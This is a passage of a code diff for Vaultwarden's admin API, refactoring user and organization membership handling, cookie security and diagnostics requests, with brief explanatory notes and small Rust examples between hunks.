+    <path d="m791.27994 223.43649-19.62891-62.79297q-1.85547-5.76171-6.93359-26.17187h-0.78125q-3.90625 17.08984-6.83594 26.36719l-20.21484 62.59765h-18.75l-29.19922-107.03125h16.99219q10.35156 40.33203 15.72265 61.42578 5.46875 21.09375 6.25 28.41797h0.78125q1.07422-5.5664 3.41797-14.35547 2.44141-8.88671 4.19922-14.0625l19.62891-61.42578h17.57812l19.14063 61.42578q5.46875 16.79688 7.42187 28.22266h0.78125q0.39063-3.51562 2.05078-10.83984 1.75781-7.32422 20.41016-78.8086h16.79687l-29.58984 107.03125zm133.98437 0-3.22265-15.23437h-0.78125q-8.00782 10.05859-16.01563 13.67187-7.91015 3.51563-19.82422 3.51563-15.91797 0-25-8.20313-8.98437-8.20312-8.98437-23.33984 0-32.42188 51.85547-33.98438l18.16406-0.58593v-6.64063q0-12.59765-5.46875-18.55469-5.37109-6.05468-17.28516-6.05468-13.3789 0-30.27343 8.20312l-4.98047-12.40234q7.91015-4.29688 17.28515-6.73828 9.47266-2.44141 18.94532-2.44141 19.14062 0 28.32031 8.49609 9.27734 8.4961 9.27734 27.2461v73.04687zm-36.62109-11.42578q15.13672 0 23.73047-8.30078 8.6914-8.30078 8.6914-23.24219v-9.66797l-16.21093 0.6836q-19.33594 0.68359-27.92969 6.05469-8.49609 5.27343-8.49609 16.5039 0 8.78906 5.27343 13.37891 5.3711 4.58984 14.94141 4.58984zm130.85938-97.55859q7.1289 0 12.793 1.17187l-2.2461 15.03907q-6.6407-1.46485-11.7188-1.46485-12.9883 0-22.26561 10.54688-9.17968 10.54687-9.17968 26.26953v57.42187h-16.21094v-107.03125h13.37891l1.85546 19.82422h0.78125q5.95704-10.44922 14.35551-16.11328 8.3984-5.66406 18.457-5.66406zm101.6602 94.6289h-0.879q-11.2304 16.3086-33.5937 16.3086-20.9961 0-32.7148-14.35547-11.6211-14.35547-11.6211-40.82031 0-26.46485 11.7187-41.11328 11.7188-14.64844 32.6172-14.64844 21.7773 0 33.3984 15.82031h1.2696l-0.6836-7.71484-0.3907-7.51953v-43.554692h16.211v151.953122h-13.1836zm-32.4219 2.73438q16.6015 0 24.0234-8.98438 7.5195-9.08203 7.5195-29.19921v-3.41797q0-22.75391-7.6171-32.42188-7.5196-9.76562-24.1211-9.76562-14.2578 0-21.875 11.13281-7.5196 11.03516-7.5196 31.25 0 20.50781 7.5196 30.95703 7.5195 10.44922 22.0703 10.44922zm127.3437 13.57422q-23.7304 0-37.5-14.45313-13.6718-14.45312-13.6718-40.13672 0-25.8789 12.6953-41.11328 12.7929-15.23437 34.2773-15.23437 20.1172 0 31.8359 13.28125 11.7188 13.18359 11.7188 34.86328v10.25391h-73.7305q0.4883 18.84765 9.4727 28.61328 9.082 9.76562 25.4883 9.76562 17.2851 0 34.1797-7.22656v14.45312q-8.5938 3.71094-16.3086 5.27344-7.6172 1.66016-18.4571 1.66016zm-4.3945-97.36328q-12.8906 0-20.6055 8.39843-7.6172 8.39844-8.9843 23.24219h55.957q0-15.33203-6.836-23.4375-6.8359-8.20312-19.5312-8.20312zm144.6289 95.41015v-69.23828q0-13.08594-5.957-19.53125-5.9571-6.44531-18.6524-6.44531-16.7968 0-24.6093 9.08203t-7.8125 29.98047v56.15234h-16.211v-107.03125h13.1836l2.6367 14.64844h0.7813q4.9804-7.91016 13.9648-12.20703 8.9844-4.39453 20.0196-4.39453 19.3359 0 29.1015 9.375 9.7656 9.27734 9.7656 29.78515v69.82422z"/>
+  </g>
+  <g transform="translate(-10.708266,-9.2965379)">
+    <g id="e" transform="matrix(2.6712834,0,0,2.6712834,150.95027,149.53854)">
+      <g id="f" mask="url(#d)">
+        <path d="m-31.1718-33.813208 26.496029 74.188883h9.3515399l26.49603-74.188883h-9.767164l-16.728866 47.588948q-1.662496 4.571864-2.805462 8.624198-1.142966 3.948427-1.870308 7.585137-.72734199-3.63671-1.8703079-7.689043-1.142966-4.052334-2.805462-8.728104l-16.624959-47.381136z" stroke="#000" stroke-width="4.51171"/>
+        <circle transform="scale(-1,1)" r="43" fill="none" stroke="#000" stroke-width="9"/>
+        <g id="g" transform="scale(-1,1)">
+          <polygon id="a" points="46 -3 46 3 51 0" stroke="#000" stroke-linejoin="round" stroke-width="3"/>
+          <use transform="rotate(11.25)" xlink:href="#a"/>
+          <use transform="rotate(22.5)" xlink:href="#a"/>
+          <use transform="rotate(33.75)" xlink:href="#a"/>
+          <use transform="rotate(45)" xlink:href="#a"/>
+          <use transform="rotate(56.25)" xlink:href="#a"/>
+          <use transform="rotate(67.5)" xlink:href="#a"/>
+          <use transform="rotate(78.75)" xlink:href="#a"/>
+          <use transform="rotate(90)" xlink:href="#a"/>
+          <use transform="rotate(101.25)" xlink:href="#a"/>
+          <use transform="rotate(112.5)" xlink:href="#a"/>
+          <use transform="rotate(123.75)" xlink:href="#a"/>
+          <use transform="rotate(135)" xlink:href="#a"/>
+          <use transform="rotate(146.25)" xlink:href="#a"/>
+          <use transform="rotate(157.5)" xlink:href="#a"/>
+          <use transform="rotate(168.75)" xlink:href="#a"/>
+          <use transform="scale(-1)" xlink:href="#a"/>
+          <use transform="rotate(191.25)" xlink:href="#a"/>
+          <use transform="rotate(202.5)" xlink:href="#a"/>
+          <use transform="rotate(213.75)" xlink:href="#a"/>
+          <use transform="rotate(225)" xlink:href="#a"/>
+          <use transform="rotate(236.25)" xlink:href="#a"/>
+          <use transform="rotate(247.5)" xlink:href="#a"/>
+          <use transform="rotate(258.75)" xlink:href="#a"/>
+          <use transform="rotate(-90)" xlink:href="#a"/>
+          <use transform="rotate(-78.75)" xlink:href="#a"/>
+          <use transform="rotate(-67.5)" xlink:href="#a"/>
+          <use transform="rotate(-56.25)" xlink:href="#a"/>
+          <use transform="rotate(-45)" xlink:href="#a"/>
+          <use transform="rotate(-33.75)" xlink:href="#a"/>
+          <use transform="rotate(-22.5)" xlink:href="#a"/>
+          <use transform="rotate(-11.25)" xlink:href="#a"/>
+        </g>
+        <g id="h" transform="scale(-1,1)">
+          <polygon id="c" points="7 -42 -7 -42 0 -35" stroke="#000" stroke-linejoin="round" stroke-width="6"/>
+          <use transform="rotate(72)" xlink:href="#c"/>
+          <use transform="rotate(144)" xlink:href="#c"/>
+          <use transform="rotate(216)" xlink:href="#c"/>
+          <use transform="rotate(-72)" xlink:href="#c"/>
+        </g>
+      </g>
+      <mask>
+        <rect x="-60" y="-60" width="120" height="120" fill="#fff"/>
+        <circle cy="-40" r="3"/>
+        <use transform="rotate(72)" xlink:href="#b"/>
+        <use transform="rotate(144)" xlink:href="#b"/>
+        <use transform="rotate(216)" xlink:href="#b"/>
+        <use transform="rotate(-72)" xlink:href="#b"/>
+      </mask>
+    </g>
+  </g>
+</svg>
@@ -1,4 +1,4 @@
 [toolchain]
-channel = "1.76.0"
+channel = "1.88.0"
 components = [ "rustfmt", "clippy" ]
 profile = "minimal"
341 src/api/admin.rs
@@ -1,4 +1,5 @@
 use once_cell::sync::Lazy;
+use reqwest::Method;
 use serde::de::DeserializeOwned;
 use serde_json::Value;
 use std::env;
@@ -17,13 +18,14 @@ use crate::{
         core::{log_event, two_factor},
         unregister_push_device, ApiResult, EmptyResult, JsonResult, Notify,
     },
-    auth::{decode_admin, encode_jwt, generate_admin_claims, ClientIp},
+    auth::{decode_admin, encode_jwt, generate_admin_claims, ClientIp, Secure},
     config::ConfigBuilder,
     db::{backup_database, get_sql_server_version, models::*, DbConn, DbConnType},
     error::{Error, MapResult},
+    http_client::make_http_request,
     mail,
     util::{
-        container_base_image, format_naive_datetime_local, get_display_size, get_reqwest_client,
+        container_base_image, format_naive_datetime_local, get_display_size, get_web_vault_version,
         is_running_in_container, NumberOrString,
     },
     CONFIG, VERSION,
@@ -48,7 +50,7 @@ pub fn routes() -> Vec<Route> {
         disable_user,
         enable_user,
         remove_2fa,
-        update_user_org_type,
+        update_membership_type,
         update_revision_users,
         post_config,
         delete_config,
@@ -60,6 +62,7 @@ pub fn routes() -> Vec<Route> {
         diagnostics,
         get_diagnostics_config,
         resend_user_invite,
+        get_diagnostics_http,
     ]
 }
 
@@ -96,9 +99,10 @@ const DT_FMT: &str = "%Y-%m-%d %H:%M:%S %Z";
 const BASE_TEMPLATE: &str = "admin/base";
 
 const ACTING_ADMIN_USER: &str = "vaultwarden-admin-00000-000000000000";
+pub const FAKE_ADMIN_UUID: &str = "00000000-0000-0000-0000-000000000000";
 
 fn admin_path() -> String {
-    format!("{}{}", CONFIG.domain_path(), ADMIN_PATH)
+    format!("{}{ADMIN_PATH}", CONFIG.domain_path())
 }
 
 #[derive(Debug)]
@@ -167,8 +171,13 @@ struct LoginForm {
     redirect: Option<String>,
 }
 
-#[post("/", data = "<data>")]
-fn post_admin_login(data: Form<LoginForm>, cookies: &CookieJar<'_>, ip: ClientIp) -> Result<Redirect, AdminResponse> {
+#[post("/", format = "application/x-www-form-urlencoded", data = "<data>")]
+fn post_admin_login(
+    data: Form<LoginForm>,
+    cookies: &CookieJar<'_>,
+    ip: ClientIp,
+    secure: Secure,
+) -> Result<Redirect, AdminResponse> {
     let data = data.into_inner();
     let redirect = data.redirect;
 
@@ -190,13 +199,14 @@ fn post_admin_login(data: Form<LoginForm>, cookies: &CookieJar<'_>, ip: ClientIp
 
     let cookie = Cookie::build((COOKIE_NAME, jwt))
         .path(admin_path())
-        .max_age(rocket::time::Duration::minutes(CONFIG.admin_session_lifetime()))
+        .max_age(time::Duration::minutes(CONFIG.admin_session_lifetime()))
         .same_site(SameSite::Strict)
-        .http_only(true);
+        .http_only(true)
+        .secure(secure.https);
 
     cookies.add(cookie);
     if let Some(redirect) = redirect {
-        Ok(Redirect::to(format!("{}{}", admin_path(), redirect)))
+        Ok(Redirect::to(format!("{}{redirect}", admin_path())))
     } else {
         Err(AdminResponse::Ok(render_admin_page()))
     }
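The `secure: Secure` guard referenced above is not defined in this hunk. As a rough sketch only, a Rocket request guard with that shape could be built from the reverse proxy's `X-Forwarded-Proto` header; the actual guard in this PR lives elsewhere and may use different signals:

```rust
use rocket::request::{FromRequest, Outcome, Request};

// Hypothetical minimal guard; the field name `https` mirrors the
// `.secure(secure.https)` call in the hunk above.
pub struct Secure {
    pub https: bool,
}

#[rocket::async_trait]
impl<'r> FromRequest<'r> for Secure {
    type Error = ();

    async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
        // Simplification: trust only the proxy's X-Forwarded-Proto header.
        let https = request
            .headers()
            .get_one("X-Forwarded-Proto")
            .map(|proto| proto.eq_ignore_ascii_case("https"))
            .unwrap_or(false);
        Outcome::Success(Secure { https })
    }
}
```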
@@ -265,21 +275,21 @@ fn admin_page_login() -> ApiResult<Html<String>> {
     render_admin_login(None, None)
 }
 
-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct InviteData {
     email: String,
 }
 
-async fn get_user_or_404(uuid: &str, conn: &mut DbConn) -> ApiResult<User> {
-    if let Some(user) = User::find_by_uuid(uuid, conn).await {
+async fn get_user_or_404(user_id: &UserId, conn: &mut DbConn) -> ApiResult<User> {
+    if let Some(user) = User::find_by_uuid(user_id, conn).await {
         Ok(user)
     } else {
         err_code!("User doesn't exist", Status::NotFound.code);
     }
 }
 
-#[post("/invite", data = "<data>")]
+#[post("/invite", format = "application/json", data = "<data>")]
 async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbConn) -> JsonResult {
     let data: InviteData = data.into_inner();
     if User::find_by_mail(&data.email, &mut conn).await.is_some() {
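`UserId` (and the `OrganizationId`/`MembershipId` types used below) replaces bare `&str` UUIDs throughout this file. A sketch of the newtype pattern, assuming a plain `String` wrapper with `From<String>` so that expressions like `FAKE_ADMIN_UUID.to_string().into()` compile; the real definitions derive more traits (serde, database mappings) than shown:

```rust
use std::fmt;

#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub struct UserId(String);

// Enables `some_string.into()`, as used with FAKE_ADMIN_UUID above.
impl From<String> for UserId {
    fn from(raw: String) -> Self {
        Self(raw)
    }
}

impl AsRef<str> for UserId {
    fn as_ref(&self) -> &str {
        &self.0
    }
}

impl fmt::Display for UserId {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        self.0.fmt(f)
    }
}
```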
@@ -290,7 +300,9 @@ async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbCon
 
 async fn _generate_invite(user: &User, conn: &mut DbConn) -> EmptyResult {
     if CONFIG.mail_enabled() {
-        mail::send_invite(&user.email, &user.uuid, None, None, &CONFIG.invitation_org_name(), None).await
+        let org_id: OrganizationId = FAKE_ADMIN_UUID.to_string().into();
+        let member_id: MembershipId = FAKE_ADMIN_UUID.to_string().into();
+        mail::send_invite(user, org_id, member_id, &CONFIG.invitation_org_name(), None).await
     } else {
         let invitation = Invitation::new(&user.email);
         invitation.save(conn).await
@@ -303,7 +315,7 @@ async fn invite_user(data: Json<InviteData>, _token: AdminToken, mut conn: DbCon
     Ok(Json(user.to_json(&mut conn).await))
 }
 
-#[post("/test/smtp", data = "<data>")]
+#[post("/test/smtp", format = "application/json", data = "<data>")]
 async fn test_smtp(data: Json<InviteData>, _token: AdminToken) -> EmptyResult {
     let data: InviteData = data.into_inner();
 
@@ -326,9 +338,9 @@ async fn get_users_json(_token: AdminToken, mut conn: DbConn) -> Json<Value> {
     let mut users_json = Vec::with_capacity(users.len());
     for u in users {
         let mut usr = u.to_json(&mut conn).await;
-        usr["UserEnabled"] = json!(u.enabled);
-        usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
-        usr["LastActive"] = match u.last_active(&mut conn).await {
+        usr["userEnabled"] = json!(u.enabled);
+        usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
+        usr["lastActive"] = match u.last_active(&mut conn).await {
             Some(dt) => json!(format_naive_datetime_local(&dt, DT_FMT)),
             None => json!(None::<String>),
         };
@@ -364,37 +376,37 @@ async fn users_overview(_token: AdminToken, mut conn: DbConn) -> ApiResult<Html<
 async fn get_user_by_mail_json(mail: &str, _token: AdminToken, mut conn: DbConn) -> JsonResult {
     if let Some(u) = User::find_by_mail(mail, &mut conn).await {
         let mut usr = u.to_json(&mut conn).await;
-        usr["UserEnabled"] = json!(u.enabled);
-        usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
+        usr["userEnabled"] = json!(u.enabled);
+        usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
         Ok(Json(usr))
     } else {
         err_code!("User doesn't exist", Status::NotFound.code);
     }
 }
 
-#[get("/users/<uuid>")]
-async fn get_user_json(uuid: &str, _token: AdminToken, mut conn: DbConn) -> JsonResult {
-    let u = get_user_or_404(uuid, &mut conn).await?;
+#[get("/users/<user_id>")]
+async fn get_user_json(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> JsonResult {
+    let u = get_user_or_404(&user_id, &mut conn).await?;
     let mut usr = u.to_json(&mut conn).await;
-    usr["UserEnabled"] = json!(u.enabled);
-    usr["CreatedAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
+    usr["userEnabled"] = json!(u.enabled);
+    usr["createdAt"] = json!(format_naive_datetime_local(&u.created_at, DT_FMT));
     Ok(Json(usr))
 }
 
-#[post("/users/<uuid>/delete")]
-async fn delete_user(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    let user = get_user_or_404(uuid, &mut conn).await?;
+#[post("/users/<user_id>/delete", format = "application/json")]
+async fn delete_user(user_id: UserId, token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    let user = get_user_or_404(&user_id, &mut conn).await?;
 
-    // Get the user_org records before deleting the actual user
-    let user_orgs = UserOrganization::find_any_state_by_user(uuid, &mut conn).await;
+    // Get the membership records before deleting the actual user
+    let memberships = Membership::find_any_state_by_user(&user_id, &mut conn).await;
     let res = user.delete(&mut conn).await;
 
-    for user_org in user_orgs {
+    for membership in memberships {
         log_event(
-            EventType::OrganizationUserRemoved as i32,
-            &user_org.uuid,
-            &user_org.org_uuid,
-            ACTING_ADMIN_USER,
+            EventType::OrganizationUserDeleted as i32,
+            &membership.uuid,
+            &membership.org_uuid,
+            &ACTING_ADMIN_USER.into(),
             14, // Use UnknownBrowser type
             &token.ip.ip,
             &mut conn,
@@ -405,17 +417,17 @@ async fn delete_user(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyRe
     res
 }
 
-#[post("/users/<uuid>/deauth")]
-async fn deauth_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
-    let mut user = get_user_or_404(uuid, &mut conn).await?;
+#[post("/users/<user_id>/deauth", format = "application/json")]
+async fn deauth_user(user_id: UserId, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
+    let mut user = get_user_or_404(&user_id, &mut conn).await?;
 
-    nt.send_logout(&user, None).await;
+    nt.send_logout(&user, None, &mut conn).await;
 
     if CONFIG.push_enabled() {
         for device in Device::find_push_devices_by_user(&user.uuid, &mut conn).await {
-            match unregister_push_device(device.push_uuid).await {
+            match unregister_push_device(&device.push_uuid).await {
                 Ok(r) => r,
-                Err(e) => error!("Unable to unregister devices from Bitwarden server: {}", e),
+                Err(e) => error!("Unable to unregister devices from Bitwarden server: {e}"),
             };
         }
     }
@@ -426,47 +438,49 @@ async fn deauth_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notif
     user.save(&mut conn).await
 }
 
-#[post("/users/<uuid>/disable")]
-async fn disable_user(uuid: &str, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
-    let mut user = get_user_or_404(uuid, &mut conn).await?;
+#[post("/users/<user_id>/disable", format = "application/json")]
+async fn disable_user(user_id: UserId, _token: AdminToken, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
+    let mut user = get_user_or_404(&user_id, &mut conn).await?;
     Device::delete_all_by_user(&user.uuid, &mut conn).await?;
     user.reset_security_stamp();
     user.enabled = false;
 
     let save_result = user.save(&mut conn).await;
 
-    nt.send_logout(&user, None).await;
+    nt.send_logout(&user, None, &mut conn).await;
 
     save_result
 }
 
-#[post("/users/<uuid>/enable")]
-async fn enable_user(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    let mut user = get_user_or_404(uuid, &mut conn).await?;
+#[post("/users/<user_id>/enable", format = "application/json")]
+async fn enable_user(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    let mut user = get_user_or_404(&user_id, &mut conn).await?;
     user.enabled = true;
 
     user.save(&mut conn).await
 }
 
-#[post("/users/<uuid>/remove-2fa")]
-async fn remove_2fa(uuid: &str, token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    let mut user = get_user_or_404(uuid, &mut conn).await?;
+#[post("/users/<user_id>/remove-2fa", format = "application/json")]
+async fn remove_2fa(user_id: UserId, token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    let mut user = get_user_or_404(&user_id, &mut conn).await?;
     TwoFactor::delete_all_by_user(&user.uuid, &mut conn).await?;
-    two_factor::enforce_2fa_policy(&user, ACTING_ADMIN_USER, 14, &token.ip.ip, &mut conn).await?;
+    two_factor::enforce_2fa_policy(&user, &ACTING_ADMIN_USER.into(), 14, &token.ip.ip, &mut conn).await?;
     user.totp_recover = None;
     user.save(&mut conn).await
 }
 
-#[post("/users/<uuid>/invite/resend")]
-async fn resend_user_invite(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    if let Some(user) = User::find_by_uuid(uuid, &mut conn).await {
+#[post("/users/<user_id>/invite/resend", format = "application/json")]
+async fn resend_user_invite(user_id: UserId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    if let Some(user) = User::find_by_uuid(&user_id, &mut conn).await {
         //TODO: replace this with user.status check when it will be available (PR#3397)
         if !user.password_hash.is_empty() {
             err_code!("User already accepted invitation", Status::BadRequest.code);
         }
 
         if CONFIG.mail_enabled() {
-            mail::send_invite(&user.email, &user.uuid, None, None, &CONFIG.invitation_org_name(), None).await
+            let org_id: OrganizationId = FAKE_ADMIN_UUID.to_string().into();
+            let member_id: MembershipId = FAKE_ADMIN_UUID.to_string().into();
+            mail::send_invite(&user, org_id, member_id, &CONFIG.invitation_org_name(), None).await
         } else {
             Ok(())
         }
@@ -475,42 +489,45 @@ async fn resend_user_invite(uuid: &str, _token: AdminToken, mut conn: DbConn) ->
     }
 }
 
-#[derive(Deserialize, Debug)]
-struct UserOrgTypeData {
+#[derive(Debug, Deserialize)]
+struct MembershipTypeData {
     user_type: NumberOrString,
-    user_uuid: String,
-    org_uuid: String,
+    user_uuid: UserId,
+    org_uuid: OrganizationId,
 }
 
-#[post("/users/org_type", data = "<data>")]
-async fn update_user_org_type(data: Json<UserOrgTypeData>, token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    let data: UserOrgTypeData = data.into_inner();
+#[post("/users/org_type", format = "application/json", data = "<data>")]
+async fn update_membership_type(data: Json<MembershipTypeData>, token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    let data: MembershipTypeData = data.into_inner();
 
-    let mut user_to_edit =
-        match UserOrganization::find_by_user_and_org(&data.user_uuid, &data.org_uuid, &mut conn).await {
-            Some(user) => user,
-            None => err!("The specified user isn't member of the organization"),
-        };
+    let Some(mut member_to_edit) = Membership::find_by_user_and_org(&data.user_uuid, &data.org_uuid, &mut conn).await
+    else {
+        err!("The specified user isn't member of the organization")
+    };
 
-    let new_type = match UserOrgType::from_str(&data.user_type.into_string()) {
+    let new_type = match MembershipType::from_str(&data.user_type.into_string()) {
         Some(new_type) => new_type as i32,
        None => err!("Invalid type"),
     };
 
-    if user_to_edit.atype == UserOrgType::Owner && new_type != UserOrgType::Owner {
+    if member_to_edit.atype == MembershipType::Owner && new_type != MembershipType::Owner {
         // Removing owner permission, check that there is at least one other confirmed owner
-        if UserOrganization::count_confirmed_by_org_and_type(&data.org_uuid, UserOrgType::Owner, &mut conn).await <= 1 {
+        if Membership::count_confirmed_by_org_and_type(&data.org_uuid, MembershipType::Owner, &mut conn).await <= 1 {
             err!("Can't change the type of the last owner")
         }
     }
 
-    // This check is also done at api::organizations::{accept_invite(), _confirm_invite, _activate_user(), edit_user()}, update_user_org_type
+    // This check is also done at api::organizations::{accept_invite, _confirm_invite, _activate_member, edit_member}, update_membership_type
     // It returns different error messages per function.
-    if new_type < UserOrgType::Admin {
-        match OrgPolicy::is_user_allowed(&user_to_edit.user_uuid, &user_to_edit.org_uuid, true, &mut conn).await {
+    if new_type < MembershipType::Admin {
+        match OrgPolicy::is_user_allowed(&member_to_edit.user_uuid, &member_to_edit.org_uuid, true, &mut conn).await {
             Ok(_) => {}
             Err(OrgPolicyErr::TwoFactorMissing) => {
-                err!("You cannot modify this user to this type because it has no two-step login method activated");
+                if CONFIG.email_2fa_auto_fallback() {
+                    two_factor::email::find_and_activate_email_2fa(&member_to_edit.user_uuid, &mut conn).await?;
+                } else {
+                    err!("You cannot modify this user to this type because they have not setup 2FA");
+                }
             }
             Err(OrgPolicyErr::SingleOrgEnforced) => {
                 err!("You cannot modify this user to this type because it is a member of an organization which forbids it");
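This hunk is one of many in the PR that replace a `match ... { Some(x) => x, None => err!(...) }` binding with the `let ... else` form (stable since Rust 1.65). A standalone illustration of the equivalence, with placeholder names:

```rust
fn find(id: u32) -> Option<String> {
    (id == 1).then(|| "owner".to_string())
}

// Pre-refactor shape: bind through a match whose None arm diverges.
fn lookup_match(id: u32) -> Result<String, &'static str> {
    let member = match find(id) {
        Some(member) => member,
        None => return Err("not a member"),
    };
    Ok(member)
}

// Post-refactor shape: let-else keeps the happy path unindented.
fn lookup_let_else(id: u32) -> Result<String, &'static str> {
    let Some(member) = find(id) else {
        return Err("not a member");
    };
    Ok(member)
}

fn main() {
    assert_eq!(lookup_match(1), lookup_let_else(1));
    assert_eq!(lookup_match(2), lookup_let_else(2));
}
```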
@@ -520,20 +537,20 @@ async fn update_user_org_type(data: Json<UserOrgTypeData>, token: AdminToken, mu
 
     log_event(
         EventType::OrganizationUserUpdated as i32,
-        &user_to_edit.uuid,
+        &member_to_edit.uuid,
         &data.org_uuid,
-        ACTING_ADMIN_USER,
+        &ACTING_ADMIN_USER.into(),
         14, // Use UnknownBrowser type
         &token.ip.ip,
         &mut conn,
     )
     .await;
 
-    user_to_edit.atype = new_type;
-    user_to_edit.save(&mut conn).await
+    member_to_edit.atype = new_type;
+    member_to_edit.save(&mut conn).await
 }
 
-#[post("/users/update_revision")]
+#[post("/users/update_revision", format = "application/json")]
 async fn update_revision_users(_token: AdminToken, mut conn: DbConn) -> EmptyResult {
     User::update_all_revisions(&mut conn).await
 }
@@ -544,7 +561,7 @@ async fn organizations_overview(_token: AdminToken, mut conn: DbConn) -> ApiResu
     let mut organizations_json = Vec::with_capacity(organizations.len());
     for o in organizations {
         let mut org = o.to_json();
-        org["user_count"] = json!(UserOrganization::count_by_org(&o.uuid, &mut conn).await);
+        org["user_count"] = json!(Membership::count_by_org(&o.uuid, &mut conn).await);
         org["cipher_count"] = json!(Cipher::count_by_org(&o.uuid, &mut conn).await);
         org["collection_count"] = json!(Collection::count_by_org(&o.uuid, &mut conn).await);
         org["group_count"] = json!(Group::count_by_org(&o.uuid, &mut conn).await);
@@ -558,17 +575,12 @@ async fn organizations_overview(_token: AdminToken, mut conn: DbConn) -> ApiResu
     Ok(Html(text))
 }
 
-#[post("/organizations/<uuid>/delete")]
-async fn delete_organization(uuid: &str, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
-    let org = Organization::find_by_uuid(uuid, &mut conn).await.map_res("Organization doesn't exist")?;
+#[post("/organizations/<org_id>/delete", format = "application/json")]
+async fn delete_organization(org_id: OrganizationId, _token: AdminToken, mut conn: DbConn) -> EmptyResult {
+    let org = Organization::find_by_uuid(&org_id, &mut conn).await.map_res("Organization doesn't exist")?;
     org.delete(&mut conn).await
 }
 
-#[derive(Deserialize)]
-struct WebVaultVersion {
-    version: String,
-}
-
 #[derive(Deserialize)]
 struct GitRelease {
     tag_name: String,
@@ -579,36 +591,30 @@ struct GitCommit {
     sha: String,
 }
 
-#[derive(Deserialize)]
-struct TimeApi {
-    year: u16,
-    month: u8,
-    day: u8,
-    hour: u8,
-    minute: u8,
-    seconds: u8,
+async fn get_json_api<T: DeserializeOwned>(url: &str) -> Result<T, Error> {
+    Ok(make_http_request(Method::GET, url)?.send().await?.error_for_status()?.json::<T>().await?)
 }
 
-async fn get_json_api<T: DeserializeOwned>(url: &str) -> Result<T, Error> {
-    let json_api = get_reqwest_client();
-
-    Ok(json_api.get(url).send().await?.error_for_status()?.json::<T>().await?)
+async fn get_text_api(url: &str) -> Result<String, Error> {
+    Ok(make_http_request(Method::GET, url)?.send().await?.error_for_status()?.text().await?)
 }
 
 async fn has_http_access() -> bool {
-    let http_access = get_reqwest_client();
-
-    match http_access.head("https://github.com/dani-garcia/vaultwarden").send().await {
+    let Ok(req) = make_http_request(Method::HEAD, "https://github.com/dani-garcia/vaultwarden") else {
+        return false;
+    };
+    match req.send().await {
         Ok(r) => r.status().is_success(),
         _ => false,
     }
 }
 
 use cached::proc_macro::cached;
-/// Cache this function to prevent API call rate limit. Github only allows 60 requests per hour, and we use 3 here already.
-/// It will cache this function for 300 seconds (5 minutes) which should prevent the exhaustion of the rate limit.
-#[cached(time = 300, sync_writes = true)]
-async fn get_release_info(has_http_access: bool, running_within_container: bool) -> (String, String, String) {
+/// Cache this function to prevent API call rate limit. Github only allows 60 requests per hour, and we use 3 here already
+/// It will cache this function for 600 seconds (10 minutes) which should prevent the exhaustion of the rate limit
+/// Any cache will be lost if Vaultwarden is restarted
+#[cached(time = 600, sync_writes = "default")]
+async fn get_release_info(has_http_access: bool) -> (String, String, String) {
     // If the HTTP Check failed, do not even attempt to check for new versions since we were not able to connect with github.com anyway.
     if has_http_access {
         (
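For context on the `#[cached(...)]` change: the `cached` proc macro memoizes a function's return value per argument set, and `time = 600` expires entries after ten minutes (`sync_writes = "default"` is the string-valued form newer crate releases expect where older ones took `true`). A minimal sketch with a synchronous function; the diff applies the same attribute to an async one:

```rust
use cached::proc_macro::cached;

// Each distinct `n` is computed at most once per 600-second window;
// repeat calls inside the window return the memoized value.
#[cached(time = 600)]
fn expensive(n: u64) -> u64 {
    println!("computing for {n}...");
    n * 2
}

fn main() {
    assert_eq!(expensive(21), 42); // prints "computing for 21..."
    assert_eq!(expensive(21), 42); // served from the cache, no print
}
```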
@@ -625,19 +631,13 @@ async fn get_release_info(has_http_access: bool, running_within_container: bool)
                 }
                 _ => "-".to_string(),
             },
-            // Do not fetch the web-vault version when running within a container.
+            // Do not fetch the web-vault version when running within a container
             // The web-vault version is embedded within the container it self, and should not be updated manually
-            if running_within_container {
-                "-".to_string()
-            } else {
-                match get_json_api::<GitRelease>(
-                    "https://api.github.com/repos/dani-garcia/bw_web_builds/releases/latest",
-                )
+            match get_json_api::<GitRelease>("https://api.github.com/repos/dani-garcia/bw_web_builds/releases/latest")
                 .await
                 {
                     Ok(r) => r.tag_name.trim_start_matches('v').to_string(),
                     _ => "-".to_string(),
-                }
             },
         )
     } else {
@@ -647,17 +647,18 @@ async fn get_release_info(has_http_access: bool, running_within_container: bool)
 
 async fn get_ntp_time(has_http_access: bool) -> String {
     if has_http_access {
-        if let Ok(ntp_time) = get_json_api::<TimeApi>("https://www.timeapi.io/api/Time/current/zone?timeZone=UTC").await
-        {
-            return format!(
-                "{year}-{month:02}-{day:02} {hour:02}:{minute:02}:{seconds:02} UTC",
-                year = ntp_time.year,
-                month = ntp_time.month,
-                day = ntp_time.day,
-                hour = ntp_time.hour,
-                minute = ntp_time.minute,
